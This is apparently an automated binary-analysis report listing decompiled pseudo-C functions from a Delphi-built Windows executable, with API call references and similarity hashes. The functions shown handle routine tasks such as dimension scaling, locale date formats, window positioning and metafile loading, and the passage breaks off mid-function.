                                                                                • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A03C
                                                                                • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A042
                                                                                • GetStdHandle.KERNEL32(000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A057
                                                                                • WriteFile.KERNEL32(00000000,000000F5,0040A0AC,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A05D
                                                                                • LoadStringA.USER32 ref: 0040A07F
                                                                                • MessageBoxA.USER32 ref: 0040A095
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                                • String ID: HpH$t@
                                                                                • API String ID: 1802973324-3679897340
                                                                                • Opcode ID: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction ID: 7d280b318de20257b267b25c9c6113f965e65ab47ef070ee4e671aee89c3a216
                                                                                • Opcode Fuzzy Hash: e34cdb547f107c02dac129002a15a92a112cff8d4a5bdf1f3d81973431fedd85
                                                                                • Instruction Fuzzy Hash: 7501A1B2244305BAD700FB64CC42F9B77ACAB05704F408A3E7355F60E2DA78E9008B2B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004352BC(intOrPtr* __eax, int __ecx, int __edx) {
                                                                                				char _t62;
                                                                                				signed int _t64;
                                                                                				signed int _t65;
                                                                                				signed char _t107;
                                                                                				intOrPtr _t113;
                                                                                				intOrPtr _t114;
                                                                                				int _t117;
                                                                                				intOrPtr* _t118;
                                                                                				int _t119;
                                                                                				int* _t121;
                                                                                
                                                                                				 *_t121 = __ecx;
                                                                                				_t117 = __edx;
                                                                                				_t118 = __eax;
                                                                                				if(__edx ==  *_t121) {
                                                                                					L29:
                                                                                					_t62 =  *0x435468; // 0x0
                                                                                					 *((char*)(_t118 + 0x98)) = _t62;
                                                                                					return _t62;
                                                                                				}
                                                                                				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                                					_t107 =  *0x435460; // 0x1f
                                                                                				} else {
                                                                                					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                                                				}
                                                                                				if((_t107 & 0x00000001) == 0) {
                                                                                					_t119 =  *(_t118 + 0x40);
                                                                                				} else {
                                                                                					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                                                				}
                                                                                				if((_t107 & 0x00000002) == 0) {
                                                                                					_t121[1] =  *(_t118 + 0x44);
                                                                                				} else {
                                                                                					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                				}
                                                                                				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                                                					_t64 =  *(_t118 + 0x48);
                                                                                					_t121[2] = _t64;
                                                                                				} else {
                                                                                					if((_t107 & 0x00000001) == 0) {
                                                                                						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                                                						_t121[2] = _t64;
                                                                                					} else {
                                                                                						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                                                						_t121[2] = _t64;
                                                                                					}
                                                                                				}
                                                                                				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                                                				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                                                					_t121[3] =  *(_t118 + 0x4c);
                                                                                				} else {
                                                                                					if(_t65 == 0) {
                                                                                						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                					} else {
                                                                                						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                                                					}
                                                                                				}
                                                                                				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                                                				_t113 =  *0x435468; // 0x0
                                                                                				if(_t113 != (_t107 &  *0x435464)) {
                                                                                					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                                                				}
                                                                                				_t114 =  *0x435468; // 0x0
                                                                                				if(_t114 != (_t107 &  *0x43546c)) {
                                                                                					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                                                				}
                                                                                				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                                                					E0041EDEC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041EDD0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                                                				}
                                                                                				goto L29;
                                                                                			}













                                                                                0x00435425
                                                                                0x00435445
                                                                                0x00435445
                                                                                0x00000000

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004352F5
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043530F
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043533D
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 00435353
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043538B
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004353A3
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 004353ED
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 00435416
                                                                                • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043543C
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction ID: 8953bc8b0a4d67b9433345c2c8a17991cd0cb88a4a3005cd9b45d3bc99294169
                                                                                • Opcode Fuzzy Hash: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction Fuzzy Hash: 405160B0208B40AFD720DF69C845B6BB7E9AF49344F08582EBDD6C7752C679E840CB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00436150(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				char _v5;
                                                                                				struct HDC__* _v12;
                                                                                				struct HDC__* _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				int _v32;
                                                                                				int _v36;
                                                                                				struct HDC__* _t33;
                                                                                				intOrPtr _t72;
                                                                                				int _t74;
                                                                                				intOrPtr _t80;
                                                                                				int _t83;
                                                                                				void* _t88;
                                                                                				int _t89;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                				intOrPtr _t94;
                                                                                
                                                                                				_t92 = _t93;
                                                                                				_t94 = _t93 + 0xffffffe0;
                                                                                				_v5 = __ecx;
                                                                                				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
                                                                                				if(_v5 == 0) {
                                                                                					_push(__edx);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_pop(_t88);
                                                                                				} else {
                                                                                					_push(__edx);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_pop(_t88);
                                                                                				}
                                                                                				_v12 = GetDesktopWindow();
                                                                                				_push(0x402);
                                                                                				_push(0);
                                                                                				_t33 = _v12;
                                                                                				_push(_t33);
                                                                                				L00406E28();
                                                                                				_v16 = _t33;
                                                                                				_push(_t92);
                                                                                				_push(0x43626b);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t94;
                                                                                				_v20 = SelectObject(_v16, E0041F36C( *((intOrPtr*)(_t88 + 0x40))));
                                                                                				_t89 = _v36;
                                                                                				_t83 = _v32;
                                                                                				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
                                                                                				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
                                                                                				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
                                                                                				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
                                                                                				SelectObject(_v16, _v20);
                                                                                				_pop(_t80);
                                                                                				 *[fs:eax] = _t80;
                                                                                				_push(0x436272);
                                                                                				_push(_v16);
                                                                                				_t72 = _v12;
                                                                                				_push(_t72);
                                                                                				L00407080();
                                                                                				return _t72;
                                                                                			}






















                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00436187
                                                                                • 72E7ACE0.USER32(?,00000000,00000402), ref: 0043619A
                                                                                • SelectObject.GDI32(?,00000000), ref: 004361BD
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004361E3
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00436205
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436224
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043623E
                                                                                • SelectObject.GDI32(?,?), ref: 0043624B
                                                                                • 72E7B380.USER32(?,?,00436272,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00436265
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ObjectSelect$B380DesktopWindow
                                                                                • String ID:
                                                                                • API String ID: 989747725-0
                                                                                • Opcode ID: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction ID: 84461609b0ce5577f178a86038dc7842a2152db3a2ecfe340c7df496a6863dc3
                                                                                • Opcode Fuzzy Hash: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction Fuzzy Hash: 4F313DB6A00219BFDB00DEEDCC85EAFBBBCAF09354B414565F504F7241C679AD048BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0040AEE4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				char _v40;
                                                                                				char _v44;
                                                                                				char _v48;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				char _v60;
                                                                                				char _v64;
                                                                                				char _v68;
                                                                                				void* _t104;
                                                                                				void* _t111;
                                                                                				void* _t133;
                                                                                				intOrPtr _t183;
                                                                                				intOrPtr _t193;
                                                                                				intOrPtr _t194;
                                                                                
                                                                                				_t191 = __esi;
                                                                                				_t190 = __edi;
                                                                                				_t193 = _t194;
                                                                                				_t133 = 8;
                                                                                				do {
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_t133 = _t133 - 1;
                                                                                				} while (_t133 != 0);
                                                                                				_push(__ebx);
                                                                                				_push(_t193);
                                                                                				_push(0x40b1af);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t194;
                                                                                				E0040AD70();
                                                                                				E004099B8(__ebx, __edi, __esi);
                                                                                				_t196 =  *0x4877fc;
                                                                                				if( *0x4877fc != 0) {
                                                                                					E00409B90(__esi, _t196);
                                                                                				}
                                                                                				_t132 = GetThreadLocale();
                                                                                				E00409908(_t43, 0, 0x14,  &_v20);
                                                                                				E00404374(0x487730, _v20);
                                                                                				E00409908(_t43, 0x40b1c4, 0x1b,  &_v24);
                                                                                				 *0x487734 = E00408708(0x40b1c4, 0, _t196);
                                                                                				E00409908(_t132, 0x40b1c4, 0x1c,  &_v28);
                                                                                				 *0x487735 = E00408708(0x40b1c4, 0, _t196);
                                                                                				 *0x487736 = E00409954(_t132, 0x2c, 0xf);
                                                                                				 *0x487737 = E00409954(_t132, 0x2e, 0xe);
                                                                                				E00409908(_t132, 0x40b1c4, 0x19,  &_v32);
                                                                                				 *0x487738 = E00408708(0x40b1c4, 0, _t196);
                                                                                				 *0x487739 = E00409954(_t132, 0x2f, 0x1d);
                                                                                				E00409908(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                				E00409C40(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                				E00404374(0x48773c, _v36);
                                                                                				E00409908(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                				E00409C40(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                				E00404374(0x487740, _v44);
                                                                                				 *0x487744 = E00409954(_t132, 0x3a, 0x1e);
                                                                                				E00409908(_t132, 0x40b1f8, 0x28,  &_v52);
                                                                                				E00404374(0x487748, _v52);
                                                                                				E00409908(_t132, 0x40b204, 0x29,  &_v56);
                                                                                				E00404374(0x48774c, _v56);
                                                                                				E00404320( &_v12);
                                                                                				E00404320( &_v16);
                                                                                				E00409908(_t132, 0x40b1c4, 0x25,  &_v60);
                                                                                				_t104 = E00408708(0x40b1c4, 0, _t196);
                                                                                				_t197 = _t104;
                                                                                				if(_t104 != 0) {
                                                                                					E004043B8( &_v8, 0x40b21c);
                                                                                				} else {
                                                                                					E004043B8( &_v8, 0x40b210);
                                                                                				}
                                                                                				E00409908(_t132, 0x40b1c4, 0x23,  &_v64);
                                                                                				_t111 = E00408708(0x40b1c4, 0, _t197);
                                                                                				_t198 = _t111;
                                                                                				if(_t111 == 0) {
                                                                                					E00409908(_t132, 0x40b1c4, 0x1005,  &_v68);
                                                                                					if(E00408708(0x40b1c4, 0, _t198) != 0) {
                                                                                						E004043B8( &_v12, 0x40b238);
                                                                                					} else {
                                                                                						E004043B8( &_v16, 0x40b228);
                                                                                					}
                                                                                				}
                                                                                				_push(_v12);
                                                                                				_push(_v8);
                                                                                				_push(":mm");
                                                                                				_push(_v16);
                                                                                				E00404698();
                                                                                				_push(_v12);
                                                                                				_push(_v8);
                                                                                				_push(":mm:ss");
                                                                                				_push(_v16);
                                                                                				E00404698();
                                                                                				 *0x4877fe = E00409954(_t132, 0x2c, 0xc);
                                                                                				_pop(_t183);
                                                                                				 *[fs:eax] = _t183;
                                                                                				_push(E0040B1B6);
                                                                                				return E00404344( &_v68, 0x10);
                                                                                			}


























                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,0040B1AF,?,?,00000000,00000000), ref: 0040AF1A
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 4232894706-2493093252
                                                                                • Opcode ID: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction ID: dd7168d140dabf44b549f8ddecd6ea9c3e8e9b3ee97471e2bc34665e137c0820
                                                                                • Opcode Fuzzy Hash: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction Fuzzy Hash: AA613B707042489BDB00FBA6CCA1A9E76A6DB89304F60943EE550BB3C6CB3CDD05875D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0043302C(intOrPtr __eax, void* __ecx, char _a4) {
                                                                                				char _v5;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				struct HWND__* _v24;
                                                                                				intOrPtr _v28;
                                                                                				char _v32;
                                                                                				struct tagRECT _v48;
                                                                                				struct tagRECT _v64;
                                                                                				struct HWND__* _t53;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t65;
                                                                                				intOrPtr _t78;
                                                                                				intOrPtr _t84;
                                                                                				intOrPtr _t86;
                                                                                				intOrPtr _t93;
                                                                                				intOrPtr _t98;
                                                                                				intOrPtr _t101;
                                                                                				void* _t102;
                                                                                				intOrPtr* _t104;
                                                                                				intOrPtr _t106;
                                                                                				intOrPtr _t110;
                                                                                				intOrPtr _t112;
                                                                                				struct HWND__* _t113;
                                                                                				intOrPtr _t114;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t117;
                                                                                
                                                                                				_t102 = __ecx;
                                                                                				_t101 = __eax;
                                                                                				_v5 = 1;
                                                                                				_t2 =  &_a4; // 0x43334d
                                                                                				_t113 = E00433464( *_t2 + 0xfffffff7);
                                                                                				_v24 = _t113;
                                                                                				_t53 = GetWindow(_t113, 4);
                                                                                				_t104 =  *0x486c60; // 0x487bfc
                                                                                				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                                                                					L6:
                                                                                					if(_v24 == 0) {
                                                                                						L25:
                                                                                						return _v5;
                                                                                					}
                                                                                					_t114 = _t101;
                                                                                					while(1) {
                                                                                						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                                                                						if(_t55 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t114 = _t55;
                                                                                					}
                                                                                					_t112 = E0043BD14(_t114);
                                                                                					_v28 = _t112;
                                                                                					if(_t112 == _v24) {
                                                                                						goto L25;
                                                                                					}
                                                                                					_t12 =  &_a4; // 0x43334d
                                                                                					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
                                                                                					if(_t60 == 0) {
                                                                                						_t18 =  &_a4; // 0x43334d
                                                                                						_t106 =  *0x4317f8; // 0x431844
                                                                                						__eflags = E00403740( *((intOrPtr*)( *_t18 - 0x10)), _t106);
                                                                                						if(__eflags == 0) {
                                                                                							__eflags = 0;
                                                                                							_v32 = 0;
                                                                                						} else {
                                                                                							_t20 =  &_a4; // 0x43334d
                                                                                							_v32 = E0043BD14( *((intOrPtr*)( *_t20 - 0x10)));
                                                                                						}
                                                                                						L19:
                                                                                						_v12 = 0;
                                                                                						_t65 = _a4;
                                                                                						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                                                						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                                                						_push( &_v32);
                                                                                						_push(E00432FC0);
                                                                                						_push(GetCurrentThreadId());
                                                                                						L00406DA8();
                                                                                						_t126 = _v12;
                                                                                						if(_v12 == 0) {
                                                                                							goto L25;
                                                                                						}
                                                                                						GetWindowRect(_v24,  &_v48);
                                                                                						_push(_a4 + 0xfffffff7);
                                                                                						_push(_a4 - 1);
                                                                                						E004037B0(_t101, _t126);
                                                                                						_t78 =  *0x487b84; // 0x0
                                                                                						_t110 =  *0x4305d4; // 0x430620
                                                                                						if(E00403740(_t78, _t110) == 0) {
                                                                                							L23:
                                                                                							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                                                								_v5 = 0;
                                                                                							}
                                                                                							goto L25;
                                                                                						}
                                                                                						_t84 =  *0x487b84; // 0x0
                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                                                                							goto L23;
                                                                                						}
                                                                                						_t86 =  *0x487b84; // 0x0
                                                                                						if(E0043BD14( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                                                                							goto L25;
                                                                                						}
                                                                                						goto L23;
                                                                                					}
                                                                                					_t116 = _t60;
                                                                                					while(1) {
                                                                                						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                                                                						if(_t93 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t116 = _t93;
                                                                                					}
                                                                                					_v32 = E0043BD14(_t116);
                                                                                					goto L19;
                                                                                				}
                                                                                				_t117 = E004325B4(_v24, _t102);
                                                                                				if(_t117 == 0) {
                                                                                					goto L25;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                                                                						if(_t98 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t117 = _t98;
                                                                                					}
                                                                                					_v24 = E0043BD14(_t117);
                                                                                					goto L6;
                                                                                				}
                                                                                			}































                                                                                0x00433074
                                                                                0x00433084
                                                                                0x00000000
                                                                                0x00433084

                                                                                APIs
                                                                                  • Part of subcall function 00433464: WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 00433464: GetParent.USER32(00000000), ref: 00433481
                                                                                • GetWindow.USER32(00000000,00000004), ref: 0043304E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00433122
                                                                                • 72E7AC10.USER32(00000000,00432FC0,?,00000000,00000004,?,-0000000C,?), ref: 00433128
                                                                                • GetWindowRect.USER32 ref: 0043313F
                                                                                • IntersectRect.USER32 ref: 004331AD
                                                                                  • Part of subcall function 004325B4: GlobalFindAtomA.KERNEL32 ref: 004325C8
                                                                                  • Part of subcall function 004325B4: GetPropA.USER32 ref: 004325DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Rect$AtomCurrentFindFromGlobalIntersectParentPointPropThread
                                                                                • String ID: M3C$M3C
                                                                                • API String ID: 2329882401-1772212157
                                                                                • Opcode ID: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction ID: a128a9aac8d38b63d4cbe000c1c78fed1b90614d1cbd1cfb40740373f1eb891c
                                                                                • Opcode Fuzzy Hash: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction Fuzzy Hash: A4516071A002059FCB50DF69C884BAEBBF4AF08355F1491A6F914EB351D738EE41CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 00455753
                                                                                • GetWindowRect.USER32 ref: 004557AD
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004557E5
                                                                                • MessageBoxA.USER32 ref: 00455826
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045589C,?,00000000,00455895), ref: 00455876
                                                                                • SetActiveWindow.USER32(?,0045589C,?,00000000,00455895), ref: 00455887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Active$MessageRect
                                                                                • String ID: (
                                                                                • API String ID: 3147912190-3887548279
                                                                                • Opcode ID: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction ID: 27f95780b0de453b95edefb76a011dd12389370940b1ed7da23c547e447e93a7
                                                                                • Opcode Fuzzy Hash: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction Fuzzy Hash: FE413C75E00208AFDB44DBA9CD95FBE77F9EB48304F14446AF900EB392D678AE048B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0042237E(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				int _v12;
                                                                                				BYTE* _v16;
                                                                                				intOrPtr _v18;
                                                                                				signed int _v24;
                                                                                				short _v26;
                                                                                				short _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char _v38;
                                                                                				struct tagMETAFILEPICT _v54;
                                                                                				intOrPtr _v118;
                                                                                				intOrPtr _v122;
                                                                                				struct tagENHMETAHEADER _v154;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t115;
                                                                                				struct HENHMETAFILE__* _t119;
                                                                                				struct HENHMETAFILE__* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                				void* _t125;
                                                                                				intOrPtr _t126;
                                                                                
                                                                                				_t124 = _t125;
                                                                                				_t126 = _t125 + 0xffffff68;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t122 = __eax;
                                                                                				E0042221C(__eax);
                                                                                				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                                				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				_v12 = _v12 - 0x16;
                                                                                				_v16 = E0040272C(_v12);
                                                                                				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                                				 *[fs:eax] = _t126;
                                                                                				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
                                                                                				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                                				if(_v24 == 0) {
                                                                                					_v24 = 0x60;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                                				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = 0;
                                                                                				_v54.yExt = 0;
                                                                                				_v54.hMF = 0;
                                                                                				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t119;
                                                                                				if(_t119 == 0) {
                                                                                					E004200B4();
